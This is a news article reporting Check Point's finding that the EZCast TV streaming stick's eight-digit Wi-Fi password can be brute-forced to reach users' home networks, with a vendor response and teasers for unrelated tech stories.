TV streaming stick brings the movies and the network backdoors

EZCast password susceptible to brute-force attack – report


Vulnerabilities in the EZCast TV streaming stick can allow a hacker to take full control of home networks, steal data and plant bots, researchers at security firm Check Point have warned, with the TV device's flaws effectively handing over root shell control over networks in users’ homes or offices.

EZCast is a HDMI dongle-based TV streamer that converts a TV into a smart TV, enabling users to connect to the internet and other media. The technology is controlled through either a smartphone app or a PC.

The stick, which has five million users worldwide, also allows users to easily connect a TV to a PC to view and transfer videos, photos, music and files.

The EZCast dongle runs on its own Wi-Fi network, secured only by an eight digit numeric password. This login credential can be cracked quite easily using a brute-force attack, Check Point’s researchers discovered. After running the attack, a hacker would gain access to an associated network.

The vulnerabilities leave all information stored on users’ personal networks exposed to potential theft. As a result, all sorts of potentially sensitive information including tax returns, bank statements, and credit cards might be up for grabs by identity thieves and cyber-criminals.

The Check Point team discovered other serious vulnerabilities in the same device last year. Check Point tried to contact EZCast several times since its discovery in July 2015 to alert it of the findings, but there have been no updates made to the device.

The EZCast dongle is marketed by China-based Visonicom. El Reg put out a request for comment on Check Point's research to Visonicom and will update this story as and when we hear more. ®

EZCast got in touch to comment: "Any Wi-Fi [device] comes with security problem[s]. I'm not sure how many people [have a] fondness [for] hacking [their] neighbour‘s Wi-Fi. After all, the dongle encryption is WPA2, though the password is 8 digits. Why don't these guys mention the hackers can hack the WLAN though the Wi-Fi signal from a PC or mobile phone Wi-Fi dongle/module? It should [be even] easier."

Similar topics


Other stories you might like

  • Why should I pay for that security option? Hijacking only happens to planes

    But if I give him my bank details, I'll be rich!

    On Call Friday is here. We'd suggest an adult beverage or two to celebrate, but only if you BYOB. While you fill your suitcase, may we present an episode of On Call in which a reader saves his boss from a dunking.

    Our tale comes from a reader Regomised as "Ed" and is set earlier this century. Ed was working as a developer in a biotech lab. He rarely spoke to the director, but did speak to the director's personal assistant a lot.

    This PA was very much a jack of all trades (and master of... well, you get the drift). HR? He was in charge of that. Ops? That too. Anything technical? Of course. Heck, even though the firm had its very own bean counter, one had to go through the PA to get anything paid or budgets approved.

    Continue reading
  • UK, Australia, to build 'network of liberty that will deter cyber attacks before they happen'

    Enhanced 'Cyber and Critical Technology Partnership' will transport crime to harsh penal regime on the other side of the world

    The United Kingdom and Australia have signed a Cyber and Critical Technology Partnership that will, among other things, transport criminals to a harsh penal regime on the other side of the world.

    Australian foreign minister Marise Payne and UK foreign secretary Liz Truss yesterday inked the document in Sydney but haven't revealed the text of the pact.

    What we do know is that the two nations have pledged to "Increase deterrence by raising the costs for hostile state activity in cyberspace – including through strategic co-ordination of our cyber sanctions regimes." That's code for both nations adopting the same deterrents and punishments for online malfeasance so that malfeasants can't shop jurisdictions to find more lenient penalties.

    Continue reading
  • Japan's Supreme Court rules cryptojacking scripts are not malware

    Coinhive-slinger wins on appeal

    A man found guilty of using the Coinhive cryptojacking script to mine Monero on users' PCs while they browsed the web has been cleared by Japan's Supreme Court on the grounds that crypto mining software is not malware.

    Tokyo High Court ruled against the defendant, 34-year-old Seiya Moroi, on charges of keeping electromagnetic records of an unjust program. That unjust program was Coinhive, a "cryptojacking" script that mines for Monero by pinching some CPU cycles when users visit a web page that includes the code. Moroi ran the code on his website.

    Coinhive has been blocked by malware and antivirus vendors as it slows down other processes, increases utility bills, and creates wear and tear on your device. But in many ways Coinhive's Javascript code acts no differently to advertisements.

    Continue reading

Biting the hand that feeds IT © 1998–2022